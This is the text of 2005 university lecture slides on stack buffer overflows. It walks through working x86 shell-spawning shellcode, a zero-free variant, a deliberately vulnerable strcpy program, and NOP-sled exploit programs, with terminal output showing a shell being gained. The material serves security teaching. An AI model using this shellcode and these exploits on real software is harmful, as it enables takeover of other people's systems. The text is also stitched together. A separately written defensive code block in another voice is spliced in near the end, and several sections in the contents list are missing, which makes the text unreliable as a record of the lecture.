Contents:
Foundations of Network and Computer Security
Announcements
Running Code in the Data Segment: testsc.c
Another Problem: Zeros
Eliminating Zeros
New Shell Code (no zeros)
Ok, We’re Done? Well…
If we know where the buffer is
Otherwise, how do we Guess?
vulnerable.c
exploit1.c
Let’s Try It!
Doesn’t Work Well: A New Idea
Final Version of Exploit
Small Buffers
Defenses
StackGuard
Sample Stack with Canary
Canaries can be Defeated
Avoiding Canaries
Moral: If Overruns Exist, High Probability of an Exploit
Non-Executing Stacks and Return to LibC
Return to LibC: Getting around the Non-Executing Stack Problem
Return to LibC: Stack Configuration
Automated Source Code Analysis
Modeling the Program
Static Analysis
An Analysis Tool for Detecting Possible Buffer Overflows
Modeling Strings
The Translation Table
Program Analysis
Evaluating the Range Analysis
An Implementation of the Tool
Empirical Results
And then there’s sendmail
Performance


Foundations of Network and Computer Security
John Black
Lecture #20
Nov 10th 2005
CSCI 6268/TLEN 5831, Fall 2005


Announcements
• I’m gone next Tuesday
  – Sorry
• We will have class!
  – Martin will present a security analysis we did on the ICC
  – This is a preview of a conference presentation to appear at ACSAC in Tucson next month
  – You are responsible for the contents of this lecture


Running Code in the Data Segment: testsc.c

    char shellcode[] =
      "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
      "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
      "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
      "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

    void main() {
      int *ret;
      ret = (int *)&ret + 2;
      (*ret) = (int)shellcode;
    }

    research $ gcc -o testsc testsc.c
    research $ ./testsc
    $ exit
    research $


Another Problem: Zeros
• Notice hex code has zero bytes
  – If we’re overrunning a command-line parameter, probably strcpy() is being used
  – It will stop copying at the first zero byte
  – We won’t get all our code transferred!
  – Can we write the shell code without zeros?


Eliminating Zeros

    Problem instruction:          Substitute with:
    --------------------------------------------------------
    movb $0x0,0x7(%esi)           xorl %eax,%eax
    movl $0x0,0xc(%esi)           movb %eax,0x7(%esi)
                                  movl %eax,0xc(%esi)
    --------------------------------------------------------
    movl $0xb,%eax                movb $0xb,%al
    --------------------------------------------------------
    movl $0x1, %eax               xorl %ebx,%ebx
    movl $0x0, %ebx               movl %ebx,%eax
                                  inc %eax
    --------------------------------------------------------


New Shell Code (no zeros)

    char shellcode[] =
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    void main() {
      int *ret;
      ret = (int *)&ret + 2;
      (*ret) = (int)shellcode;
    }

    research $ gcc -o testsc testsc.c
    research $ ./testsc
    $ exit
    research $


Ok, We’re Done? Well…
• We have zero-less shell code
• It is relocatable
• It spawns a shell
• We just have to get it onto the stack of some vulnerable program!
  – And then we have to modify the return address in that stack frame to jump to the beginning of our shell code… ahh…
  – If we know the buffer size and the address where the buffer sits, we’re done (this is the case when we have the code on the same OS sitting in front of us)
  – If we don’t know these two items, we have to guess…


If we know where the buffer is

    char shellcode[] = . . .
    char large_string[128];

    void main() {
      char buffer[96];
      long *long_ptr = (long *) large_string;
      for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;
      for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];
      large_string[127] = '\0';
      strcpy(buffer,large_string);
    }
    // This works: ie, it spawns a shell


Otherwise, how do we Guess?
• The stack always starts at the same (high) memory address
  – Here is sp.c:

    unsigned long get_sp(void) {
      __asm__("movl %esp,%eax");
    }

    void main() {
      printf("0x%x\n", get_sp());
    }

    $ ./sp
    0x8000470
    $


vulnerable.c

    void main(int argc, char *argv[]) {
      char buffer[512];
      if (argc > 1)
        strcpy(buffer,argv[1]);
    }

• Now we need to inject our shell code into this program
  – We’ll pretend we don’t know the code layout or the buffer size
  – Let’s attack this program


exploit1.c

    void main(int argc, char *argv[]) {
      if (argc > 1) bsize = atoi(argv[1]);
      if (argc > 2) offset = atoi(argv[2]);
      buff = malloc(bsize);
      addr = get_sp() - offset;
      printf("Using address: 0x%x\n", addr);
      ptr = buff;
      addr_ptr = (long *) ptr;
      for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;
      ptr += 4;
      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
      buff[bsize - 1] = '\0';
      memcpy(buff,"EGG=",4);
      putenv(buff);
      system("/bin/bash");
    }


Let’s Try It!

    research $ ./exploit1 600 0
    Using address: 0xbffffdb4
    research $ ./vulnerable $EGG
    Illegal instruction
    research $ exit
    research $ ./exploit1 600 100
    Using address: 0xbffffd4c
    research $ ./vulnerable $EGG
    Segmentation fault
    research $ exit
    research $ ./exploit1 600 200
    Using address: 0xbffffce8
    research $ ./vulnerable $EGG
    Segmentation fault
    research $ exit
    ...
    research $ ./exploit1 600 1564
    Using address: 0xbffff794
    research $ ./vulnerable $EGG
    $


Doesn’t Work Well: A New Idea
• We would have to guess exactly the buffer’s address
  – Where the shell code starts
• A better technique exists
  – Pad front of shell code with NOP’s
  – We’ll fill half of our (guessed) buffer size with NOP’s and then insert the shell code
  – Fill the rest with return addresses
  – If we jump anywhere in the NOP section, our shell code will execute


Final Version of Exploit

    void main(int argc, char *argv[]) {
      int i;
      if (argc > 1) bsize = atoi(argv[1]);
      if (argc > 2) offset = atoi(argv[2]);
      buff = malloc(bsize);
      addr = get_sp() - offset;
      printf("Using address: 0x%x\n", addr);
      ptr = buff;
      addr_ptr = (long *) ptr;
      for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;
      for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;
      ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
      buff[bsize - 1] = '\0';
      memcpy(buff,"EGG=",4);
      putenv(buff);
      system("/bin/bash");
    }


Small Buffers
• What if buffer is so small we can’t fit the shell code in it?
  – Other techniques possible
  – One way is to modify the program’s environment
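Two defender-side checks for what the slides above show, as an added example that is not part of the lecture and not the code the slides reproduce: the unbounded strcpy() in vulnerable.c is replaced by a bounded copy that reports when the argument would have overrun the 512-byte buffer, and the argument is scanned for the NOP padding described under "Doesn’t Work Well: A New Idea", which is a classic intrusion-detection signature for such payloads. The names bounded_copy, longest_nop_run, looks_like_sled and handle_argument, the 16-byte run threshold and the constructed sample input are my own assumptions; the NOP byte value 0x90 is the x86 encoding, which the slides do not state.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. Bounded replacement for the
 * strcpy(buffer, argv[1]) in vulnerable.c: copies at most dst_size-1
 * bytes, always NUL-terminates, and returns 1 when src would not have
 * fit (i.e. the original strcpy() would have overrun dst), else 0. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t src_len = strlen(src);
    size_t n;

    if (dst_size == 0)
        return 1;                          /* nothing can be stored */
    n = src_len < dst_size ? src_len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return src_len >= dst_size;
}

/* Length of the longest run of x86 NOP bytes (0x90; an assumption, the
 * slides say "NOP" without giving the encoding) in buf[0..len). */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, cur = 0;

    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x90) {
            cur++;
            if (cur > best)
                best = cur;
        } else {
            cur = 0;
        }
    }
    return best;
}

/* Detection heuristic: does the argument contain a NOP run of at least
 * `threshold` bytes, as the padded exploit buffer on the slides does? */
int looks_like_sled(const char *arg, size_t threshold)
{
    return longest_nop_run((const unsigned char *)arg, strlen(arg)) >= threshold;
}

/* Hardened stand-in for vulnerable.c: same 512-byte buffer, but the
 * copy is bounded. Returns 0 if the argument fit, -1 if it was too
 * long (and therefore truncated instead of smashing the stack). */
int handle_argument(const char *arg)
{
    char buffer[512];

    if (bounded_copy(buffer, sizeof buffer, arg)) {
        fprintf(stderr, "argument too long (%zu bytes), truncated\n", strlen(arg));
        return -1;
    }
    return 0;
}

int main(int argc, char *argv[])
{
    /* Constructed sample: 600 bytes shaped like the slides' buffer,
     * 300 NOPs followed by filler; used when no argument is given. */
    char sample[600];
    const char *arg;

    memset(sample, 0x90, 300);
    memset(sample + 300, 'A', 299);
    sample[599] = '\0';
    arg = argc > 1 ? argv[1] : sample;

    if (looks_like_sled(arg, 16))
        fprintf(stderr, "warning: NOP run of %zu bytes in argument\n",
                longest_nop_run((const unsigned char *)arg, strlen(arg)));
    return handle_argument(arg) == 0 ? 0 : 1;
}
```

The bounded copy is the actual fix: it removes the overrun regardless of what the input contains. The NOP-run scan is only a detection aid; long runs of a single byte also occur in legitimate binary data and the heuristic is known to be evadable, so treat a hit as something to log and investigate, not as a substitute for bounds checking.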
CU-Boulder CSCI 6268 - Lecture #20